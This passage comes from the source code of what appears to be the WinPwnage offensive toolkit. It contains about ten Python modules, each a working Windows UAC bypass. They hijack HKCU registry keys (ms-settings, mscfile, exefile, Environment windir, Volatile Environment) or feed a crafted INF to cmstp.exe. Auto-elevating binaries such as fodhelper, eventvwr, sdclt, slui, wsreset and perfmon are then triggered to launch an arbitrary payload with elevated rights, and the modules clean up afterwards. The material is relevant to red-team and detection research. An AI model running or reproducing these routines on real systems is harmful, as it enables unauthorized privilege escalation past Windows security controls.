Payload": True, 20 | } 21 | 22 | def uacMethod13_cleanup(): 23 | print_info("Performing cleaning") 24 | try: 25 | os.remove(os.path.join(tempfile.gettempdir(), "tmp.ini")) 26 | except Exception as error: 27 | print_error("Unable to clean up, manual cleaning is needed") 28 | return False 29 | else: 30 | print_success("Successfully cleaned up") 31 | print_success("All done!") 32 | 33 | def uacMethod13(payload): 34 | if payloads().exe(payload): 35 | inf_template = '''[version] 36 | Signature=$chicago$ 37 | AdvancedINF=2.5 38 | 39 | [DefaultInstall] 40 | CustomDestination=CustInstDestSectionAllUsers 41 | RunPreSetupCommands=RunPreSetupCommandsSection 42 | 43 | [RunPreSetupCommandsSection] 44 | ''' + os.path.join(payloads().exe(payload)[1]) + ''' 45 | taskkill /IM cmstp.exe /F 46 | 47 | [CustInstDestSectionAllUsers] 48 | 49000,49001=AllUSer_LDIDSection, 7 49 | 50 | [AllUSer_LDIDSection] 51 | "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" 52 | 53 | [Strings] 54 | ServiceName="WinPwnageVPN" 55 | ShortSvcName="WinPwnageVPN" 56 | ''' 57 | try: 58 | ini_file = open(os.path.join(tempfile.gettempdir(), "tmp.ini"), "w") 59 | ini_file.write(inf_template) 60 | ini_file.close() 61 | except Exception: 62 | print_error("Cannot proceed, unable to ini file to disk ({})".format(os.path.join(tempfile.gettempdir(), "tmp.ini"))) 63 | return False 64 | else: 65 | print_success("Successfully wrote ini template to disk ({})".format(os.path.join(tempfile.gettempdir(), "tmp.ini"))) 66 | 67 | time.sleep(1) 68 | 69 | if process().terminate("cmstp.exe"): 70 | print_success("Successfully terminated cmstp process") 71 | else: 72 | pass 73 | 74 | time.sleep(1) 75 | 76 | if process().create("cmstp.exe", params="/au {tmp_path}".format(tmp_path=os.path.join(tempfile.gettempdir(), "tmp.ini")), window=False): 77 | #if process().create("cmstp.exe", params="/au {tmp_path}".format(tmp_path=os.path.join(tempfile.gettempdir(), "tmp.ini")), window=True): 78 | print_success("Successfully triggered installation of ini file using cmstp binary") 79 | else: 80 | print_error("Unable to trigger installation of ini file using cmstp binary") 81 | for x in Constant.output: 82 | if "error" in x: 83 | uacMethod13_cleanup() 84 | return False 85 | 86 | time.sleep(1) 87 | 88 | """ 89 | hwnd = ctypes.windll.user32.FindWindowA(None, "WinPwnageVPN") 90 | if hwnd: 91 | print_success("Successfully detected process window - hwnd ({hwnd})".format(hwnd=hwnd)) 92 | else: 93 | print_error("Unable to detect process window, cannot proceed") 94 | for x in Constant.output: 95 | if "error" in x: 96 | cmstp_cleanup() 97 | return False 98 | 99 | time.sleep(1) 100 | 101 | if ctypes.windll.user32.SetForegroundWindow(hwnd): 102 | print_success("Activated window using SetForegroundWindow - hwnd ({hwnd})".format(hwnd=hwnd)) 103 | else: 104 | print_error("Unable to activate window using SetForegroundWindow - hwnd ({hwnd})".format(hwnd=hwnd)) 105 | for x in Constant.output: 106 | if "error" in x: 107 | cmstp_cleanup() 108 | return False 109 | 110 | time.sleep(1) 111 | """ 112 | 113 | if ctypes.windll.user32.keybd_event(0x0D,0,0,0): 114 | #print_success("Successfully sent keyboard-event to window - hwnd ({hwnd})".format(hwnd=hwnd)) 115 | print_success("Successfully sent keyboard-event to window") 116 | time.sleep(5) 117 | uacMethod13_cleanup() 118 | else: 119 | #print_error("Unable to send keyboard-event to window - hwnd ({hwnd})".format(hwnd=hwnd)) 120 | print_error("Unable to send keyboard-event to window") 121 | for x in Constant.output: 122 | if "error" in x: 123 | uacMethod13_cleanup() 124 | return False 125 | else: 126 | print_error("Cannot proceed, invalid payload") 127 | return False 128 | -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod14.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | # https://www.activecyber.us/activelabs/windows-uac-bypass 7 | 8 | uacMethod14_info = { 9 | "Description": "UAC bypass using wsreset.exe", 10 | "Method": "Registry key (Class) manipulation", 11 | "Id": "14", 12 | "Type": "UAC bypass", 13 | "Fixed In": "99999" if not information().uac_level() == 4 else "0", 14 | "Works From": "17134", 15 | "Admin": False, 16 | "Function Name": "uacMethod14", 17 | "Function Payload": True, 18 | } 19 | 20 | def uacMethod14_cleanup(path): 21 | print_info("Performing cleaning") 22 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=True): 23 | print_success("Successfully cleaned up") 24 | print_success("All done!") 25 | else: 26 | print_error("Unable to cleanup") 27 | return False 28 | 29 | def uacMethod14(payload): 30 | if payloads().exe(payload): 31 | path = "Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command" 32 | 33 | if registry().modify_key(hkey="hkcu", path=path, name=None, 34 | value="{cmd_path} /c start {payload}".format( 35 | cmd_path=os.path.join(information().system_directory(), 36 | "cmd.exe"), payload=payloads().exe(payload)[1]), create=True): 37 | if registry().modify_key(hkey="hkcu", path=path, name="DelegateExecute", value=None, create=True): 38 | print_success("Successfully created Default and DelegateExecute key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 39 | else: 40 | print_error("Unable to create registry keys") 41 | for x in Constant.output: 42 | if "error" in x: 43 | uacMethod14_cleanup(path) 44 | return False 45 | else: 46 | print_error("Unable to create registry keys") 47 | return False 48 | 49 | time.sleep(5) 50 | 51 | print_info("Disabling file system redirection") 52 | with disable_fsr(): 53 | print_success("Successfully disabled file system redirection") 54 | 55 | print_info("Waiting for wsreset.exe to finish, this can take a few seconds") 56 | exit_code = process().create("WSReset.exe", get_exit_code=True) 57 | if exit_code == 0: 58 | print_success("Successfully spawned process ({})".format(os.path.join(payloads().exe(payload)[1]))) 59 | time.sleep(5) 60 | uacMethod14_cleanup(path) 61 | else: 62 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 63 | for x in Constant.output: 64 | if "error" in x: 65 | uacMethod14_cleanup(path) 66 | return False 67 | else: 68 | print_error("Cannot proceed, invalid payload") 69 | return False -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod15.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | # https://rootm0s.github.io 7 | 8 | uacMethod15_info = { 9 | "Description": "UAC bypass using slui.exe and changepk.exe", 10 | "Method": "Registry key (Class) manipulation", 11 | "Id": "15", 12 | "Type": "UAC bypass", 13 | "Fixed In": "99999" if not information().uac_level() == 4 else "0", 14 | "Works From": "17763", 15 | "Admin": False, 16 | "Function Name": "uacMethod15", 17 | "Function Payload": True, 18 | } 19 | 20 | def uacMethod15_cleanup(path): 21 | print_info("Performing cleaning") 22 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=True): 23 | print_success("Successfully cleaned up") 24 | print_success("All done!") 25 | else: 26 | print_error("Unable to cleanup") 27 | return False 28 | 29 | def uacMethod15(payload): 30 | if payloads().exe(payload): 31 | path = "Software\\Classes\\Launcher.SystemSettings\\shell\\open\\command" 32 | 33 | if registry().modify_key(hkey="hkcu", path=path, name=None, value=payloads().exe(payload)[1], create=True): 34 | if registry().modify_key(hkey="hkcu", path=path, name="DelegateExecute", value=None, create=True): 35 | print_success("Successfully created Default and DelegateExecute key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 36 | else: 37 | print_error("Unable to create registry keys") 38 | for x in Constant.output: 39 | if "error" in x: 40 | uacMethod15_cleanup(path) 41 | return False 42 | else: 43 | print_error("Unable to create registry keys") 44 | return False 45 | 46 | time.sleep(5) 47 | 48 | print_info("Disabling file system redirection") 49 | with disable_fsr(): 50 | print_success("Successfully disabled file system redirection") 51 | if process().runas(os.path.join("slui.exe")): 52 | print_success("Successfully spawned process ({})".format(os.path.join(payloads().exe(payload)[1]))) 53 | time.sleep(5) 54 | uacMethod15_cleanup(path) 55 | else: 56 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 57 | for x in Constant.output: 58 | if "error" in x: 59 | uacMethod15_cleanup(path) 60 | return False 61 | else: 62 | print_error("Cannot proceed, invalid payload") 63 | return False -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod2.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | uacMethod2_info = { 7 | "Description": "UAC bypass using fodhelper.exe", 8 | "Method": "Registry key (Class) manipulation", 9 | "Id": "2", 10 | "Type": "UAC bypass", 11 | "Fixed In": "99999" if not information().uac_level() == 4 else "0", 12 | "Works From": "10240", 13 | "Admin": False, 14 | "Function Name": "uacMethod2", 15 | "Function Payload": True, 16 | } 17 | 18 | def uacMethod2_cleanup(path): 19 | print_info("Performing cleaning") 20 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=True): 21 | print_success("Successfully cleaned up") 22 | print_success("All done!") 23 | else: 24 | print_error("Unable to cleanup") 25 | return False 26 | 27 | def uacMethod2(payload): 28 | if payloads().exe(payload): 29 | path = "Software\\Classes\\ms-settings\\shell\\open\\command" 30 | 31 | if registry().modify_key(hkey="hkcu", path=path, name=None, value=payloads().exe(payload)[1], create=True): 32 | if registry().modify_key(hkey="hkcu", path=path, name="DelegateExecute", value=None, create=True): 33 | print_success("Successfully created Default and DelegateExecute key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 34 | else: 35 | print_error("Unable to create registry keys") 36 | for x in Constant.output: 37 | if "error" in x: 38 | uacMethod2_cleanup(path) 39 | return False 40 | else: 41 | print_error("Unable to create registry keys") 42 | return False 43 | 44 | time.sleep(5) 45 | 46 | print_info("Disabling file system redirection") 47 | with disable_fsr(): 48 | print_success("Successfully disabled file system redirection") 49 | if process().create("fodhelper.exe"): 50 | print_success("Successfully spawned process ({})".format(os.path.join(payloads().exe(payload)[1]))) 51 | time.sleep(5) 52 | uacMethod2_cleanup(path) 53 | else: 54 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 55 | for x in Constant.output: 56 | if "error" in x: 57 | uacMethod2_cleanup(path) 58 | return False 59 | else: 60 | print_error("Cannot proceed, invalid payload") 61 | return False -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod3.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | uacMethod3_info = { 7 | "Description": "UAC bypass using slui.exe", 8 | "Method": "Registry key (Class) manipulation", 9 | "Id": "3", 10 | "Type": "UAC bypass", 11 | "Fixed In": "99999" if not information().uac_level() == 4 else "0", 12 | "Works From": "9600", 13 | "Admin": False, 14 | "Function Name": "uacMethod3", 15 | "Function Payload": True, 16 | } 17 | 18 | def uacMethod3_cleanup(path): 19 | print_info("Performing cleaning") 20 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=True): 21 | print_success("Successfully cleaned up") 22 | print_success("All done!") 23 | else: 24 | print_error("Unable to cleanup") 25 | return False 26 | 27 | def uacMethod3(payload): 28 | if payloads().exe(payload): 29 | path = "Software\\Classes\\exefile\\shell\\open\\command" 30 | 31 | if registry().modify_key(hkey="hkcu", path=path, name=None, value=payloads().exe(payload)[1], create=True): 32 | if registry().modify_key(hkey="hkcu", path=path, name="DelegateExecute", value=None, create=True): 33 | print_success("Successfully created Default and DelegateExecute key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 34 | else: 35 | print_error("Unable to create registry keys") 36 | for x in Constant.output: 37 | if "error" in x: 38 | uacMethod3_cleanup(path) 39 | return False 40 | else: 41 | print_error("Unable to create registry keys") 42 | return False 43 | 44 | time.sleep(5) 45 | 46 | print_info("Disabling file system redirection") 47 | with disable_fsr(): 48 | print_success("Successfully disabled file system redirection") 49 | if process().runas(os.path.join("slui.exe")): 50 | print_success("Successfully spawned process ({})".format(os.path.join(payloads().exe(payload)[1]))) 51 | time.sleep(5) 52 | uacMethod3_cleanup(path) 53 | else: 54 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 55 | for x in Constant.output: 56 | if "error" in x: 57 | uacMethod3_cleanup(path) 58 | return False 59 | else: 60 | print_error("Cannot proceed, invalid payload") 61 | return False -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod4.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | uacMethod4_info = { 7 | "Description": "UAC bypass using silentcleanup scheduled task", 8 | "Method": "Registry key (Environment) manipulation, this bypasses UAC's Always Notify.", 9 | "Id": "4", 10 | "Type": "UAC bypass", 11 | "Fixed In": "99999", 12 | "Works From": "9600", 13 | "Admin": False, 14 | "Function Name": "uacMethod4", 15 | "Function Payload": True, 16 | } 17 | 18 | def uacMethod4_cleanup(path): 19 | print_info("Performing cleaning") 20 | if registry().remove_key(hkey="hkcu", path=path, name="windir", delete_key=False): 21 | print_success("Successfully cleaned up") 22 | else: 23 | print_error("Unable to cleanup") 24 | return False 25 | 26 | def uacMethod4(payload): 27 | if payloads().exe(payload): 28 | path = "Environment" 29 | 30 | if registry().modify_key(hkey="hkcu", path=path, name="windir", value="cmd.exe /c start {payload} &&".format(payload=os.path.join(payloads().exe(payload)[1])), create=True): 31 | print_success("Successfully created WINDIR key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 32 | else: 33 | print_error("Unable to create registry keys") 34 | return False 35 | 36 | time.sleep(5) 37 | 38 | print_info("Disabling file system redirection") 39 | with disable_fsr(): 40 | print_success("Successfully disabled file system redirection") 41 | if process().create("schtasks.exe", params="/Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I"): 42 | print_success("Successfully spawned process ({})".format(os.path.join(payloads().exe(payload)[1]))) 43 | else: 44 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 45 | if "error" in Constant.output: 46 | uacMethod4_cleanup(path) 47 | 48 | time.sleep(5) 49 | 50 | if not uacMethod4_cleanup(path): 51 | print_success("All done!") 52 | else: 53 | print_error("Cannot proceed, invalid payload") 54 | return False 55 | -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod5.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | uacMethod5_info = { 7 | "Description": "UAC bypass using sdclt.exe (IsolatedCommand)", 8 | "Method": "Method: Registry key (Class) manipulation", 9 | "Id": "5", 10 | "Type": "UAC bypass", 11 | "Fixed In": "17025" if not information().uac_level() == 4 else "0", 12 | "Works From": "10240", 13 | "Admin": False, 14 | "Function Name": "uacMethod5", 15 | "Function Payload" : True, 16 | } 17 | 18 | def uacMethod5_cleanup(path): 19 | print_info("Performing cleaning") 20 | if registry().remove_key(hkey="hkcu", path=path, name="IsolatedCommand", delete_key=False): 21 | print_success("Successfully cleaned up") 22 | print_success("All done!") 23 | else: 24 | print_error("Unable to cleanup") 25 | return False 26 | 27 | def uacMethod5(payload): 28 | if payloads().exe(payload): 29 | path = "Software\\Classes\\exefile\\shell\\runas\\command" 30 | 31 | if registry().modify_key(hkey="hkcu", path=path, name="IsolatedCommand", value=payloads().exe(payload)[1], create=True): 32 | print_success("Successfully created IsolatedCommand key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 33 | else: 34 | print_error("Unable to create registry keys") 35 | return False 36 | 37 | time.sleep(5) 38 | 39 | print_info("Disabling file system redirection") 40 | with disable_fsr(): 41 | print_success("Successfully disabled file system redirection") 42 | if process().create("sdclt.exe", params="/kickoffelev"): 43 | print_success("Successfully spawned process ({})".format(payloads().exe(payload)[1])) 44 | time.sleep(5) 45 | uacMethod5_cleanup(path) 46 | else: 47 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 48 | for x in Constant.output: 49 | if "error" in x: 50 | uacMethod5_cleanup(path) 51 | return False 52 | else: 53 | print_error("Cannot proceed, invalid payload") 54 | return False -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod6.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | uacMethod6_info = { 7 | "Description": "UAC bypass using sdclt.exe (App Paths)", 8 | "Method": "Method: Registry key (App Paths) manipulation", 9 | "Id": "6", 10 | "Type": "UAC bypass", 11 | "Fixed In": "16215" if not information().uac_level() == 4 else "0", 12 | "Works From": "10240", 13 | "Admin": False, 14 | "Function Name": "uacMethod6", 15 | "Function Payload": True, 16 | } 17 | 18 | def uacMethod6_cleanup(path): 19 | print_info("Performing cleaning") 20 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=False): 21 | print_success("Successfully cleaned up") 22 | print_success("All done!") 23 | else: 24 | print_error("Unable to cleanup") 25 | return False 26 | 27 | def uacMethod6(payload): 28 | if payloads().exe(payload): 29 | path = "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe" 30 | 31 | if registry().modify_key(hkey="hkcu", path=path, name=None, value=payloads().exe(payload)[1], create=True): 32 | print_success("Successfully created Default key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 33 | else: 34 | print_error("Unable to create registry keys") 35 | return False 36 | 37 | time.sleep(5) 38 | 39 | print_info("Disabling file system redirection") 40 | with disable_fsr(): 41 | print_success("Successfully disabled file system redirection") 42 | if process().create("sdclt.exe"): 43 | print_success("Successfully spawned process ({})".format(payloads().exe(payload)[1])) 44 | time.sleep(5) 45 | uacMethod6_cleanup(path) 46 | else: 47 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 48 | for x in Constant.output: 49 | if "error" in x: 50 | uacMethod6_cleanup(path) 51 | return False 52 | else: 53 | print_error("Cannot proceed, invalid payload") 54 | return False 55 | -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod7.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import tempfile 4 | import shutil 5 | import time 6 | import os 7 | 8 | uacMethod7_info = { 9 | "Description": "UAC bypass using perfmon.exe", 10 | "Method": "Registry key (Volatile Environment) manipulation", 11 | "Id": "7", 12 | "Type": "UAC bypass", 13 | "Fixed In": "16299" if not information().uac_level() == 4 else "0", 14 | "Works From": "7600", 15 | "Admin": False, 16 | "Function Name": "perfmon", 17 | "Function Payload": True, 18 | } 19 | 20 | def uacMethod7_cleanup(path): 21 | print_info("Performing cleaning") 22 | if registry().remove_key(hkey="hkcu", path=path, name="SYSTEMROOT", delete_key=False): 23 | print_success("Successfully cleaned up") 24 | print_success("All done!") 25 | else: 26 | print_error("Unable to cleanup") 27 | return False 28 | 29 | def uacMethod7(payload): 30 | if payloads().exe(payload): 31 | if not os.path.exists(payload[0]): 32 | print_error("Args are not allowed with this technique") 33 | return False 34 | 35 | path = "Volatile Environment" 36 | 37 | if registry().modify_key(hkey="hkcu", path=path, name="SYSTEMROOT", value=tempfile.gettempdir(), create=True): 38 | print_success("Successfully created SYSTEMROOT key containing a new temp directory ({dir})".format( 39 | dir=os.path.join(tempfile.gettempdir()))) 40 | else: 41 | print_error("Unable to create registry keys") 42 | return False 43 | 44 | 45 | 46 | if not os.path.exists(os.path.join(tempfile.gettempdir(), "system32")): 47 | try: 48 | os.makedirs(os.path.join(tempfile.gettempdir(), "system32")) 49 | except Exception as error: 50 | print_error("Unable to create directory ({tmp_path})".format(tmp_path=os.path.join(tempfile.gettempdir(), "system32"))) 51 | for x in Constant.output: 52 | if "error" in x: 53 | uacMethod7_cleanup(path) 54 | return False 55 | else: 56 | print_success("Successfully created directory ({tmp_path})".format(tmp_path=os.path.join(tempfile.gettempdir(), "system32"))) 57 | else: 58 | print_warning("Directory already exists ({tmp_path}) using existing one".format(tmp_path=os.path.join(tempfile.gettempdir(), "system32"))) 59 | 60 | time.sleep(5) 61 | 62 | try: 63 | os.remove(os.path.join(tempfile.gettempdir(), "system32\\mmc.exe")) 64 | except Exception as error: 65 | pass 66 | 67 | try: 68 | shutil.copy(payload[0], os.path.join(tempfile.gettempdir(), "system32\\mmc.exe")) 69 | except shutil.Error as error: 70 | print_error("Unable to copy payload to directory ({tmp_path})".format(tmp_path=os.path.join(tempfile.gettempdir(), "system32"))) 71 | for x in Constant.output: 72 | if "error" in x: 73 | uacMethod7_cleanup(path) 74 | return False 75 | except IOError as error: 76 | print_error("Unable to copy payload to directory ({tmp_path})".format(tmp_path=os.path.join(tempfile.gettempdir(), "system32"))) 77 | for x in Constant.output: 78 | if "error" in x: 79 | uacMethod7_cleanup(path) 80 | return False 81 | else: 82 | print_success("Successfully copied payload to directory ({tmp_path})".format(tmp_path=os.path.join(tempfile.gettempdir(), "system32"))) 83 | 84 | time.sleep(5) 85 | 86 | print_info("Disabling file system redirection") 87 | with disable_fsr(): 88 | print_success("Successfully disabled file system redirection") 89 | if process().create("perfmon.exe"): 90 | print_success("Successfully spawned process ({})".format(payload[0])) 91 | time.sleep(5) 92 | uacMethod7_cleanup(path) 93 | else: 94 | print_error("Unable to spawn process ({})".format(payload[0])) 95 | for x in Constant.output: 96 | if "error" in x: 97 | uacMethod7_cleanup(path) 98 | return False 99 | else: 100 | print_error("Cannot proceed, invalid payload") 101 | return False 102 | -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod8.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | uacMethod8_info = { 7 | "Description": "UAC bypass using eventvwr.exe", 8 | "Method": "Registry key (Class) manipulation", 9 | "Id": "8", 10 | "Type": "UAC bypass", 11 | "Fixed In": "15031" if not information().uac_level() == 4 else "0", 12 | "Works From": "7600", 13 | "Admin": False, 14 | "Function Name": "uacMethod8", 15 | "Function Payload": True, 16 | } 17 | 18 | def uacMethod8_cleanup(path): 19 | print_info("Performing cleaning") 20 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=True): 21 | print_success("Successfully cleaned up") 22 | else: 23 | print_error("Unable to cleanup") 24 | return False 25 | 26 | def uacMethod8(payload): 27 | if payloads().exe(payload): 28 | path = "Software\\Classes\\mscfile\\shell\\open\\command" 29 | 30 | if registry().modify_key(hkey="hkcu", path=path, name=None, value=payloads().exe(payload)[1], create=True): 31 | print_success("Successfully created Default key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 32 | else: 33 | print_error("Unable to create registry keys") 34 | return False 35 | 36 | time.sleep(5) 37 | 38 | print_info("Disabling file system redirection") 39 | with disable_fsr(): 40 | print_success("Successfully disabled file system redirection") 41 | if process().create("eventvwr.exe"): 42 | print_success("Successfully spawned process ({})".format(os.path.join(payloads().exe(payload)[1]))) 43 | time.sleep(5) 44 | uacMethod8_cleanup(path) 45 | else: 46 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 47 | for x in Constant.output: 48 | if "error" in x: 49 | uacMethod8_cleanup(path) 50 | return False 51 | else: 52 | print_error("Cannot proceed, invalid payload") 53 | return False -------------------------------------------------------------------------------- /winpwnage/functions/uac/uacMethod9.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import time 4 | import os 5 | 6 | uacMethod9_info = { 7 | "Description": "UAC bypass using compmgmtlauncher.exe", 8 | "Method": "Registry key (Class) manipulation", 9 | "Id": "9", 10 | "Type": "UAC bypass", 11 | "Fixed In": "15031" if not information().uac_level() == 4 else "0", 12 | "Works From": "7600", 13 | "Admin": False, 14 | "Function Name": "uacMethod9", 15 | "Function Payload": True, 16 | } 17 | 18 | def uacMethod9_cleanup(path): 19 | print_info("Performing cleaning") 20 | if registry().remove_key(hkey="hkcu", path=path, name=None, delete_key=True): 21 | print_success("Successfully cleaned up") 22 | print_success("All done!") 23 | else: 24 | print_error("Unable to cleanup") 25 | return False 26 | 27 | def uacMethod9(payload): 28 | if payloads().exe(payload): 29 | path = "Software\\Classes\\mscfile\\shell\\open\\command" 30 | 31 | if registry().modify_key(hkey="hkcu", path=path, name=None, value=payloads().exe(payload)[1], create=True): 32 | print_success("Successfully created Default key containing payload ({payload})".format(payload=os.path.join(payloads().exe(payload)[1]))) 33 | else: 34 | print_error("Unable to create registry keys") 35 | return False 36 | 37 | time.sleep(5) 38 | 39 | print_info("Disabling file system redirection") 40 | with disable_fsr(): 41 | print_success("Successfully disabled file system redirection") 42 | if process().create("CompMgmtLauncher.exe"): 43 | print_success("Successfully spawned process ({})".format(os.path.join(payloads().exe(payload)[1]))) 44 | time.sleep(5) 45 | uacMethod9_cleanup(path) 46 | else: 47 | print_error("Unable to spawn process ({})".format(os.path.join(payloads().exe(payload)[1]))) 48 | for x in Constant.output: 49 | if "error" in x: 50 | uacMethod9_cleanup(path) 51 | return False 52 | else: 53 | print_error("Cannot proceed, invalid payload") 54 | return False 55 | --------------------------------------------------------------------------------